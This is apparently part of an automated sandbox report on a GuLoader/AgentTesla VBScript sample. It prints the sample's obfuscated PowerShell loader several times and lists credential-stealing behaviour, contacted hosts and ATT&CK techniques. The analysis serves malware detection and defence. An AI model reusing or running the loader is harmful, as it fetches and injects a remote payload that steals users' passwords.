lmelongimper4underrsho.t0excurhtang,luntrejaut el,aben5astho0ton.dh u,viygodkevmel ed incrucylinsi.olaeurtep_distrshypertafl s-kulbrcscrevkhugorhthermkimperipadd r db.f- frasd.vervrno,ar ';$laservid=banuyo17 'mili.>.nten ';$sommerperioden=banuyo17 'ga boifor.seforndxv ars ';$pseudonitrosite = banuyo17 'bru,eecr.chc p.coh.odomo.kuds afsni%sol,eare.sepunderptruand.icebasavortsectiaunder%hangm\ene gaskotjusysteswopudt sprorallosaindsklpremiigigg.a balln forssamygd. alsihnormtost rmvcorka chond& sk u& stan sp,see orn,cerhvehmonaroterep .epu$ coal ';decoupled (banuyo17 'overk$kkkeng j,gellivsooud,tibsleepaphotolbarda:newsdf os.aumultilfe.tud typhmtamaraklaveaellipnforsteparalroptag=stran(,torkc,anghmrea tdnerve skunk/brrencindl langb$undulpindh spr.oceorganuhemlidaust olokalnterroi immattrombrr.dimocon,es lig i mcmutdknavemotor)inds ');decoupled (banuyo17 ',rnsk$f,stegsili lsaksnopr.blbaghanabeseeltriak:staffbd wcoogallftgngerr undey cecelko,gelemotii.appedsnakea k ajeu.ret=uddel$fyrina,lutmm.osimpfra aubekentsubdeacostltindpoicholaosemiwnopstaebuffer unsy.commissynkrpmaterl polliflight scra( fusi$fr igllnsuma cir.s metaekunstrmoderv optaibirgidfinge)bidra ');$amputationer=$botryllidae[0];decoupled (banuyo17 ',lyve$ek,orgmiswrltherioplenubfedtialfterltexti: temkfiskerisocyeovergm ubee parar kichedyna topspa= svignsvin,efibe,w port-krakeo urtzbhypopjga,eke unvocprfert bulb sl,ghsdiscoy errasshankterhere ma gmsmert.dubionhaworeprototsliv.. rojwfenesekv,enb ,uricmyreulstudei prstebssemnbogomtbeby ');decoupled (banuyo17 'arbej$jenirkstjerrbegitebarsemhaandeudsidrmrke.e fordtjunki.lensahnovemediakoasam
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$klervske = 1;$hengivnes='substrin';$hengivnes+='g';function banuyo17($kolonihaves){$paraglossia=$kolonihaves.length-$klervske;for($grazer=5; $grazer -lt $paraglossia; $grazer+=(6)){$fradrage249+=$kolonihaves.$hengivnes.invoke($grazer, $klervske);}$fradrage249;}function decoupled($calorically){& ($sommerperioden) ($calorically);}$brodfrs=banuyo17 'b mbemstillor,kalzrehonigematllacerlmatria asse/ p.oc5klods.sy.sl0azotu prore( bjerwbuskaiufejlnligkad,yclooudstawressosstarn cran,narbejtkisse depe1kv te0incre.o lys0 nove; h na pathowscrobibndlenloved6a.skr4ma.ne;for a presixoblig6imper4uophr;fejlb kvalirshiitvtinct: gru 1carro2le,kb1diasy. demu0smi g) skin rumplgenostesolitc fo hkcyma,o blnd/paape2h.rsk0 doze1 ofma0tasti0unbad1distr0odont1vag,e tossefbrohoi semir,yvstebrnesf skirovelsexexuld/bevis1ujaev2samos1exter.thwac0sees ';$stenotaphrum=banuyo17 'trbl,ukomplsstatsesmaalr hj,o-det,ualovfog ,asteforomn un ntgreg ';$amputationer=banuyo17 'sederh ar.dtfremsttredip.luklsgalde: ansk/fr.ml/antiadkvster mandifripavsati.eg.lio. sikkgseb sobyto,omaximgnontelbal ieeinar.syntacarb.jo ,gebmbalda/interugonofcovera?takeueuvistxkvit,pr,maioindbertranst pree=caissdposteobowlewcorn,n steeluns.lomatera boncd besi&o erfiunburdsynta=prten1,aghuopars lmelongimper4underrsho.t0excurhtang,luntrejaut el,aben5astho0ton.dh u,viygodkevmel ed incrucylinsi.olaeurtep_distrshypertafl s-kulbrcscrevkhugorhthermkimperipadd r db.f- frasd.vervrno,ar ';$laservid=banuyo17 'mili.>.nten ';$sommerperioden=banuyo17 'ga boifor.seforndxv ars ';$pseudonitrosite = banuyo17 'bru,eecr.chc p.coh.odomo.kuds afsni%sol,eare.sepunderptruand.icebasavortsectiaunder%hangm\ene gaskotjusysteswopudt sprorallosaindsklpremiigigg.a balln forssamygd. alsihnormtost rmvcorka chond& sk u& stan sp,see orn,cerhvehmonaroterep .epu$ coal ';decoupled (banuyo17 'overk$kkkeng j,gellivsooud,tibsleepaphotolbarda:newsdf os.aumultilfe.tud typhmtamaraklaveaellipnforsteparalroptag=stran(,torkc,anghmrea tdnerve skunk/brrencindl langb$undulpindh spr.oceorganuhemlidaust olokalnterroi immattrombrr.dimocon,es lig i mcmutdknavemotor)inds ');decoupled (banuyo17 ',rnsk$f,stegsili lsaksnopr.blbaghanabeseeltriak:staffbd wcoogallftgngerr undey cecelko,gelemotii.appedsnakea k ajeu.ret=uddel$fyrina,lutmm.osimpfra aubekentsubdeacostltindpoicholaosemiwnopstaebuffer unsy.commissynkrpmaterl polliflight scra( fusi$fr igllnsuma cir.s metaekunstrmoderv optaibirgidfinge)bidra ');$amputationer=$botryllidae[0];decoupled (banuyo17 ',lyve$ek,orgmiswrltherioplenubfedtialfterltexti: temkfiskerisocyeovergm ubee parar kichedyna topspa= svignsvin,efibe,w port-krakeo urtzbhypopjga,eke unvocprfert bulb sl,ghsdiscoy errasshankterhere ma gmsmert.dubionhaworeprototsliv.. rojwfenesekv,enb ,uricmyreulstudei prstebssemnbogomtbeby ');decoupled (banuyo17 'arbej$jenirkstjerrbegitebarsemhaandeudsidrmrke.e fordtjunki.lensahnovemediakoasam
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$klervske = 1;$hengivnes='substrin';$hengivnes+='g';function banuyo17($kolonihaves){$paraglossia=$kolonihaves.length-$klervske;for($grazer=5; $grazer -lt $paraglossia; $grazer+=(6)){$fradrage249+=$kolonihaves.$hengivnes.invoke($grazer, $klervske);}$fradrage249;}function decoupled($calorically){& ($sommerperioden) ($calorically);}$brodfrs=banuyo17 'b mbemstillor,kalzrehonigematllacerlmatria asse/ p.oc5klods.sy.sl0azotu prore( bjerwbuskaiufejlnligkad,yclooudstawressosstarn cran,narbejtkisse depe1kv te0incre.o lys0 nove; h na pathowscrobibndlenloved6a.skr4ma.ne;for a presixoblig6imper4uophr;fejlb kvalirshiitvtinct: gru 1carro2le,kb1diasy. demu0smi g) skin rumplgenostesolitc fo hkcyma,o blnd/paape2h.rsk0 doze1 ofma0tasti0unbad1distr0odont1vag,e tossefbrohoi semir,yvstebrnesf skirovelsexexuld/bevis1ujaev2samos1exter.thwac0sees ';$stenotaphrum=banuyo17 'trbl,ukomplsstatsesmaalr hj,o-det,ualovfog ,asteforomn un ntgreg ';$amputationer=banuyo17 'sederh ar.dtfremsttredip.luklsgalde: ansk/fr.ml/antiadkvster mandifripavsati.eg.lio. sikkgseb sobyto,omaximgnontelbal ieeinar.syntacarb.jo ,gebmbalda/interugonofcovera?takeueuvistxkvit,pr,maioindbertranst pree=caissdposteobowlewcorn,n steeluns.lomatera boncd besi&o erfiunburdsynta=prten1,aghuopars lmelongimper4underrsho.t0excurhtang,luntrejaut el,aben5astho0ton.dh u,viygodkevmel ed incrucylinsi.olaeurtep_distrshypertafl s-kulbrcscrevkhugorhthermkimperipadd r db.f- frasd.vervrno,ar ';$laservid=banuyo17 'mili.>.nten ';$sommerperioden=banuyo17 'ga boifor.seforndxv ars ';$pseudonitrosite = banuyo17 'bru,eecr.chc p.coh.odomo.kuds afsni%sol,eare.sepunderptruand.icebasavortsectiaunder%hangm\ene gaskotjusysteswopudt sprorallosaindsklpremiigigg.a balln forssamygd. alsihnormtost rmvcorka chond& sk u& stan sp,see orn,cerhvehmonaroterep .epu$ coal ';decoupled (banuyo17 'overk$kkkeng j,gellivsooud,tibsleepaphotolbarda:newsdf os.aumultilfe.tud typhmtamaraklaveaellipnforsteparalroptag=stran(,torkc,anghmrea tdnerve skunk/brrencindl langb$undulpindh spr.oceorganuhemlidaust olokalnterroi immattrombrr.dimocon,es lig i mcmutdknavemotor)inds ');decoupled (banuyo17 ',rnsk$f,stegsili lsaksnopr.blbaghanabeseeltriak:staffbd wcoogallftgngerr undey cecelko,gelemotii.appedsnakea k ajeu.ret=uddel$fyrina,lutmm.osimpfra aubekentsubdeacostltindpoicholaosemiwnopstaebuffer unsy.commissynkrpmaterl polliflight scra( fusi$fr igllnsuma cir.s metaekunstrmoderv optaibirgidfinge)bidra ');$amputationer=$botryllidae[0];decoupled (banuyo17 ',lyve$ek,orgmiswrltherioplenubfedtialfterltexti: temkfiskerisocyeovergm ubee parar kichedyna topspa= svignsvin,efibe,w port-krakeo urtzbhypopjga,eke unvocprfert bulb sl,ghsdiscoy errasshankterhere ma gmsmert.dubionhaworeprototsliv.. rojwfenesekv,enb ,uricmyreulstudei prstebssemnbogomtbeby ');decoupled (banuyo17 'arbej$jenirkstjerrbegitebarsemhaandeudsidrmrke.e fordtjunki.lensahnovemediakoasamJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$klervske = 1;$hengivnes='substrin';$hengivnes+='g';function banuyo17($kolonihaves){$paraglossia=$kolonihaves.length-$klervske;for($grazer=5; $grazer -lt $paraglossia; $grazer+=(6)){$fradrage249+=$kolonihaves.$hengivnes.invoke($grazer, $klervske);}$fradrage249;}function decoupled($calorically){& ($sommerperioden) ($calorically);}$brodfrs=banuyo17 'b mbemstillor,kalzrehonigematllacerlmatria asse/ p.oc5klods.sy.sl0azotu prore( bjerwbuskaiufejlnligkad,yclooudstawressosstarn cran,narbejtkisse depe1kv te0incre.o lys0 nove; h na pathowscrobibndlenloved6a.skr4ma.ne;for a presixoblig6imper4uophr;fejlb kvalirshiitvtinct: gru 1carro2le,kb1diasy. demu0smi g) skin rumplgenostesolitc fo hkcyma,o blnd/paape2h.rsk0 doze1 ofma0tasti0unbad1distr0odont1vag,e tossefbrohoi semir,yvstebrnesf skirovelsexexuld/bevis1ujaev2samos1exter.thwac0sees ';$stenotaphrum=banuyo17 'trbl,ukomplsstatsesmaalr hj,o-det,ualovfog ,asteforomn un ntgreg ';$amputationer=banuyo17 'sederh ar.dtfremsttredip.luklsgalde: ansk/fr.ml/antiadkvster mandifripavsati.eg.lio. sikkgseb sobyto,omaximgnontelbal ieeinar.syntacarb.jo ,gebmbalda/interugonofcovera?takeueuvistxkvit,pr,maioindbertranst pree=caissdposteobowlewcorn,n steeluns.lomatera boncd besi&o erfiunburdsynta=prten1,aghuopars lmelongimper4underrsho.t0excurhtang,luntrejaut el,aben5astho0ton.dh u,viygodkevmel ed incrucylinsi.olaeurtep_distrshypertafl s-kulbrcscrevkhugorhthermkimperipadd r db.f- frasd.vervrno,ar ';$laservid=banuyo17 'mili.>.nten ';$sommerperioden=banuyo17 'ga boifor.seforndxv ars ';$pseudonitrosite = banuyo17 'bru,eecr.chc p.coh.odomo.kuds afsni%sol,eare.sepunderptruand.icebasavortsectiaunder%hangm\ene gaskotjusysteswopudt sprorallosaindsklpremiigigg.a balln forssamygd. alsihnormtost rmvcorka chond& sk u& stan sp,see orn,cerhvehmonaroterep .epu$ coal ';decoupled (banuyo17 'overk$kkkeng j,gellivsooud,tibsleepaphotolbarda:newsdf os.aumultilfe.tud typhmtamaraklaveaellipnforsteparalroptag=stran(,torkc,anghmrea tdnerve skunk/brrencindl langb$undulpindh spr.oceorganuhemlidaust olokalnterroi immattrombrr.dimocon,es lig i mcmutdknavemotor)inds ');decoupled (banuyo17 ',rnsk$f,stegsili lsaksnopr.blbaghanabeseeltriak:staffbd wcoogallftgngerr undey cecelko,gelemotii.appedsnakea k ajeu.ret=uddel$fyrina,lutmm.osimpfra aubekentsubdeacostltindpoicholaosemiwnopstaebuffer unsy.commissynkrpmaterl polliflight scra( fusi$fr igllnsuma cir.s metaekunstrmoderv optaibirgidfinge)bidra ');$amputationer=$botryllidae[0];decoupled (banuyo17 ',lyve$ek,orgmiswrltherioplenubfedtialfterltexti: temkfiskerisocyeovergm ubee parar kichedyna topspa= svignsvin,efibe,w port-krakeo urtzbhypopjga,eke unvocprfert bulb sl,ghsdiscoy errasshankterhere ma gmsmert.dubionhaworeprototsliv.. rojwfenesekv,enb ,uricmyreulstudei prstebssemnbogomtbeby ');decoupled (banuyo17 'arbej$jenirkstjerrbegitebarsemhaandeudsidrmrke.e fordtjunki.lensahnovemediakoasamJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2645999528.0000000025C6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2645999528.0000000025C6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information321
            Scripting            		Valid Accounts221
            Windows Management Instrumentation            		321
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		111
            Process Injection            		2
            Obfuscated Files or Information            		11
            Input Capture            		24
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter            		Logon Script (Windows)Logon Script (Windows)1
            Software Packing            		1
            Credentials in Registry            		211
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Process Discovery            		Distributed Component Object Model11
            Input Capture            		13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets141
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
            Process Injection            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427934 Sample: Arrival Notice PUS_pdf.vbs Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 31 mail.myhydropowered.com 2->31 33 ip-api.com 2->33 35 3 other IPs or domains 2->35 49 Multi AV Scanner detection for domain / URL 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 9 other signatures 2->55 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 57 VBScript performs obfuscated calls to suspicious functions 9->57 59 Suspicious powershell command line found 9->59 61 Wscript starts Powershell (via cmd or directly) 9->61 63 3 other signatures 9->63 12 powershell.exe 14 19 9->12         started        16 WmiPrvSE.exe 9->16         started        process6 dnsIp7 41 drive.usercontent.google.com 142.250.105.132, 443, 49708, 49714 GOOGLEUS United States 12->41 43 drive.google.com 142.251.15.139, 443, 49707, 49713 GOOGLEUS United States 12->43 73 Suspicious powershell command line found 12->73 75 Very long command line found 12->75 77 Found suspicious powershell code related to unpacking or dynamic code loading 12->77 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 45 Writes to foreign memory regions 18->45 47 Found suspicious powershell code related to unpacking or dynamic code loading 18->47 25 wab.exe 15 8 18->25         started        29 cmd.exe 1 18->29         started        process11 dnsIp12 37 ip-api.com 208.95.112.1, 49716, 80 TUT-ASUS United States 25->37 39 api.ipify.org 104.26.13.205, 443, 49715 CLOUDFLARENETUS United States 25->39 65 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->65 67 Tries to steal Mail credentials (via file / registry access) 25->67 69 Tries to harvest and steal ftp login credentials 25->69 71 2 other signatures 25->71 signatures13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Arrival Notice PUS_pdf.vbs13%ReversingLabsScript-WScript.Trojan.Guloader
            Arrival Notice PUS_pdf.vbs15%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            bg.microsoft.map.fastly.net0%VirustotalBrowse
            mail.myhydropowered.com5%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://crl.microsoft0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            		199.232.210.172
            		truefalseunknown
            drive.google.com
            		142.251.15.139
            		truefalse
              		high
              drive.usercontent.google.com
              		142.250.105.132
              		truefalse
                		high
                api.ipify.org
                		104.26.13.205
                		truefalse
                  		high
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high
                    mail.myhydropowered.com
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                      		high
                      http://ip-api.com/line/?fields=hostingfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.google.compowershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
